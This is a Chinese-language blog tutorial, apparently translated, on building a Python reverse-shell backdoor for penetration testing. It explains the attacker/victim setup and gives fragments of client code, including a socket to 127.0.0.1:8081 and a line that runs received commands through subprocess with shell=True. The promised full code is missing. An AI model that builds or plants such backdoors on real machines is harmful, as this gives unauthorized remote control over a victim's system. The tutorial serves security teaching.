在 Python 中创建后门
在 Python 中创建后门
后门的主要目的是向目标机器发送和接收命令(和数据),以获得有价值的数据或增加目标机器和网络的权限。
为了促进这种交互,黑客在目标机器上安装恶意代码,创建连接并允许黑客发送信息。
Shell 是道德黑客可以用来在合同期间进行渗透测试的重要软件。在本文中,我们将教有抱负的道德黑客如何制作他们的第一个外壳。
资源: https://www.ivoidwarranties.tech/posts/pentesting-tuts/metasploit/simple-attack/
在信息安全领域内,存在两种类型的有效载荷:shell 和反向 shell。
Shell 直接在黑客可以连接的目标机器上创建一个服务器。
反向 shell 有一个客户端组件和一个服务器组件。客户端在已经拥有攻击者 IP 地址的目标机器上运行。
因为初始连接的方向是“反向的”(如从受害者到攻击者),所以外壳被称为反向外壳。展望未来,我们将编写一个反向 shell。目标将被称为受害者,黑客的机器称为攻击者。
首先,我们必须创建将在攻击者身上运行的服务器。有以下四个步骤:
- 获取我们的本地 IP 和指定的端口。
- 绑定 IP 和端口以创建套接字。
- 启动监听器。
- 在无限循环中发送和接收命令。
接下来,我们将基于硬编码的 IP 和端口连接到攻击者,因为它无法动态检索这些。
因为我们在本地机器上运行这个反向 shell,所以套接字看起来像这样:
REMOTE_HOST = '127.0.0.1'REMOTE_PORT = 8081 # 2222client = socket.socket()
此外,我们必须接收命令并使用库 子进程
打开终端并并行运行命令。这就是它的样子:
command = client.recv(1024)command = command.decode()op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
服务器的完整代码如下:
下面是一个反向 shell 的例子:
左边是客户端,右边是服务器。
首先运行服务器,然后运行客户端将允许用户按照承诺使用服务器发送和接收数据。请检查一下,让我知道你的想法。
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明